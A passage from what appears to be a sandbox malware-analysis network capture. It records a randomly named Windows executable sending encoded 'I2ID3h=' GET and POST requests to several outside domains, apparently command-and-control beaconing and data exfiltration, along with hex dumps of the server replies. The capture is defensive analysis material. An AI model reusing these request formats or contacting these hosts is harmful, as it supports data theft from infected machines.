May 30, 2024 15:03:19.839114904 CEST	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
May 30, 2024 15:03:19.839179039 CEST	1236	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
May 30, 2024 15:03:19.839188099 CEST	672	IN	Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
May 30, 2024 15:03:19.839342117 CEST	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
May 30, 2024 15:03:19.839386940 CEST	224	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
May 30, 2024 15:03:19.839396000 CEST	1236	IN	Data Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
May 30, 2024 15:03:19.839405060 CEST	224	IN	Data Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
May 30, 2024 15:03:19.844101906 CEST	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49736	162.0.213.94	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:21.696469069 CEST	438	OUT	GET /e20q/?I2ID3h=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRN4bGZF5mTK/2R7/0SECzHSrPiKfzVgxr4RzAam04Uo8fzA==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:03:22.302012920 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:03:22 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
May 30, 2024 15:03:22.302031040 CEST	1236	IN	Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
May 30, 2024 15:03:22.302069902 CEST	1236	IN	Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
May 30, 2024 15:03:22.302093029 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
May 30, 2024 15:03:22.302105904 CEST	896	IN	Data Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
May 30, 2024 15:03:22.302129030 CEST	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
May 30, 2024 15:03:22.302141905 CEST	1236	IN	Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
May 30, 2024 15:03:22.302151918 CEST	448	IN	Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
May 30, 2024 15:03:22.302263021 CEST	1236	IN	Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
May 30, 2024 15:03:22.302282095 CEST	1236	IN	Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
May 30, 2024 15:03:22.307001114 CEST	1236	IN	Data Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49737	172.82.177.221	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:27.976839066 CEST	688	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 35 4c 78 34 46 4c 44 5a 39 58 2f 62 55 34 42 50 54 47 57 31 44 4d 71 54 35 6e 2b 4b 42 79 55 52 6a 6d 32 6d 63 52 4a 77 38 4f 4a 43 48 5a 33 67 33 79 62 54 4b 34 75 37 31 41 55 52 67 33 62 57 4b 6a 7a 54 47 71 56 66 4c 6b 4c 32 35 37 52 6a 76 6e 59 64 64 38 5a 66 59 5a 78 79 43 45 2b 32 65 43 46 70 68 6b 48 34 49 38 4a 4a 74 51 36 66 73 2b 77 77 61 44 68 53 51 65 7a 75 7a 33 4d 37 46 59 73 6a 78 57 6d 44 5a 74 4a 33 4d 54 41 6a 6b 4c 46 48 79 42 42 64 57 35 62 69 41 64 32 73 46 77 34 4c 68 6a 59 65 41 58 4f 65 75 75 59 30 48 44 48 48 62 65 59 71 55 4c 41 3d Data Ascii: I2ID3h=m4CeyHIdc3Vj5Lx4FLDZ9X/bU4BPTGW1DMqT5n+KByURjm2mcRJw8OJCHZ3g3ybTK4u71AURg3bWKjzTGqVfLkL257RjvnYdd8ZfYZxyCE+2eCFphkH4I8JJtQ6fs+wwaDhSQezuz3M7FYsjxWmDZtJ3MTAjkLFHyBBdW5biAd2sFw4LhjYeAXOeuuY0HDHHbeYqULA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49738	172.82.177.221	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:30.506002903 CEST	708	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 77 52 67 43 36 6d 64 54 68 77 2f 4f 4a 43 4a 35 33 6c 34 53 62 61 4b 34 7a 59 31 41 59 52 67 33 50 57 4b 6d 33 54 46 64 35 59 4c 30 4c 34 73 72 52 6c 72 6e 59 64 64 38 5a 66 59 5a 6c 55 43 45 32 32 65 79 31 70 68 42 6e 2f 57 73 4a 47 71 51 36 66 6d 65 77 30 61 44 68 30 51 63 48 55 7a 31 30 37 46 5a 63 6a 79 48 6d 63 4b 4e 4a 78 42 7a 42 71 31 36 55 6c 33 68 70 38 65 66 54 68 57 75 54 52 4e 6d 56 68 37 42 51 32 54 33 69 6d 2b 39 51 44 57 7a 6d 75 42 39 49 61 4b 63 55 73 37 4e 2f 37 77 45 4d 5a 70 5a 45 49 31 4f 4a 57 44 52 57 76 Data Ascii: I2ID3h=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCAwRgC6mdThw/OJCJ53l4SbaK4zY1AYRg3PWKm3TFd5YL0L4srRlrnYdd8ZfYZlUCE22ey1phBn/WsJGqQ6fmew0aDh0QcHUz107FZcjyHmcKNJxBzBq16Ul3hp8efThWuTRNmVh7BQ2T3im+9QDWzmuB9IaKcUs7N/7wEMZpZEI1OJWDRWv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49739	172.82.177.221	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:33.039268970 CEST	1725	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 34 52 6a 78 79 6d 64 79 68 77 2b 4f 4a 43 42 5a 33 6b 34 53 61 49 4b 34 37 45 31 42 6b 72 67 30 33 57 4a 41 4c 54 45 70 74 59 46 30 4c 34 75 72 52 6b 76 6e 5a 66 64 38 4a 62 59 5a 31 55 43 45 32 32 65 77 74 70 6d 55 48 2f 55 73 4a 4a 74 51 36 4c 73 2b 77 63 61 44 4a 4b 51 63 54 45 77 42 49 37 46 35 4d 6a 7a 31 2b 63 4a 74 4a 7a 43 7a 42 79 31 36 59 54 33 6e 4e 4f 65 66 4f 4b 57 74 44 52 62 48 6b 75 71 46 4d 5a 48 32 54 45 38 76 38 77 45 6c 36 65 45 38 73 38 4a 2f 30 44 6e 63 44 79 6d 7a 63 4c 70 61 46 61 6b 2f 46 52 42 78 37 39 78 79 32 43 34 4d 63 75 4e 63 4b 4a 53 43 39 6c 77 68 30 7a 59 71 2f 45 78 2b 48 59 41 50 4e 78 75 37 56 67 6f 50 51 2f 63 67 59 66 44 6d 67 5a 4c 5a 6a 46 74 6b 79 68 57 48 78 48 45 66 47 2f 38 71 4e 30 4a 6e 69 64 55 42 4c 2f 73 4d 4a 66 51 55 59 66 6c 37 7a 72 69 2b 6a 42 49 4a 54 7a 2b 51 64 71 52 49 2f 4a 74 47 7a 38 4f 79 6a [TRUNCATED] Data Ascii: I2ID3h=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCA4Rjxymdyhw+OJCBZ3k4SaIK47E1Bkrg03WJALTEptYF0L4urRkvnZfd8JbYZ1UCE22ewtpmUH/UsJJtQ6Ls+wcaDJKQcTEwBI7F5Mjz1+cJtJzCzBy16YT3nNOefOKWtDRbHkuqFMZH2TE8v8wEl6eE8s8J/0DncDymzcLpaFak/FRBx79xy2C4McuNcKJSC9lwh0zYq/Ex+HYAPNxu7VgoPQ/cgYfDmgZLZjFtkyhWHxHEfG/8qN0JnidUBL/sMJfQUYfl7zri+jBIJTz+QdqRI/JtGz8OyjowHX9WuLEJpV3DdximuWavdS2LwqDWxFuwqAH2zx2pO0AplDL1JJaJ9P+XRcVxq/tQGJSkTc0bzcK2Trg2Ub8Nh70dz2f0OvG4ccC6Y35egad6RN3ZBUE9BO7plawNA4Ws05veiLi1cjmNHoVrsx6JQCg6ZDiyy4C/2MPSdW53MPsHUDcFnuSaU8xuykTnxV0Jr59DFa0f8IF8E7gAzlD6qnWT5i96BK9+VGmg9zwk2hohnS3qxm4JtCi82yqTCa04XKsvgeDMMabp9P5icnmOd+iEn2RE8mmklfxjzZNB0JapV5dQGHpDkqdVv3SKKsUc69EAayp+ftH05dx80wfAVE7ugSrMzrkMXq+2vWCsKCnVOGwXH588Xxo9nlV54MBwfedUCqf6XVzyxVZhiIsE8dzbhRRTpaQabS0gqivxlcXO9uPyZFdfPBzHpu/HCs9aW6vCFpl84eRF+jvhHq5FbGeNLuN/9B67cf8i5BvV2lCABbBEBe11WzS5e1esiD7pBxkmZxgcBN0ujgBXEJAqhropWYWwIFLpInpqMJqic1D+dk4foTXkhx7UXjlzr+ugJd5x+SqlEMT90fxNrBr0IYN9LKqJ+6/RuiYO7AawXaToBaVPakta9HwGLD7va5qPcphGhwvZxJVihQ9LtBsWnYt3258qtHtx [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49740	172.82.177.221	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:35.574702978 CEST	436	OUT	GET /2ha1/?aN6=3TWTWTzxVTU&I2ID3h=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2MGDyrphp7y0SUfwCG55tOna8TREqvQmgePUorTaqhIxnZg== HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:03:36.170874119 CEST	917	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 May 2024 13:03:36 GMT Content-Type: text/html Content-Length: 781 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cf f3 c9 bd d7 d0 d0 c5 d7 b0 ca ce b2 c4 c1 cf b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 [TRUNCATED] Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49741	15.204.0.108	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:41.711791039 CEST	706	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 70 6e 38 54 51 6e 6c 52 42 47 51 78 79 37 65 32 78 51 54 49 64 74 6a 74 79 48 77 2f 39 59 46 72 58 78 36 5a 71 4a 72 71 4f 67 72 70 70 31 74 50 4e 35 4e 54 35 30 2f 4d 55 70 66 71 36 2f 50 39 6e 6d 53 56 49 4d 71 44 6c 42 76 4d 31 76 35 6f 2f 74 72 34 52 7a 71 56 6e 73 57 6a 58 30 4b 47 77 49 32 64 61 58 49 64 65 34 4a 51 5a 4e 4d 41 79 78 38 6c 2b 2f 56 47 77 34 75 42 58 33 44 31 78 63 31 31 41 6a 6d 67 32 38 38 41 33 64 76 4e 39 6d 49 71 43 67 67 47 6e 41 6a 6d 75 64 55 50 44 58 58 75 68 46 45 78 4f 4e 5a 78 68 6d 58 4f 30 4a 48 5a 69 37 2f 42 43 6d 30 3d Data Ascii: 